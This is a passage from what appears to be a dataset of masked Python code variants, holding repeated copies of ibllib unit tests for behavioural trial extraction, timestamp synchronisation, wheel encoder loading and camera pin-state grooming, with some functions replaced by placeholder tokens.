sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 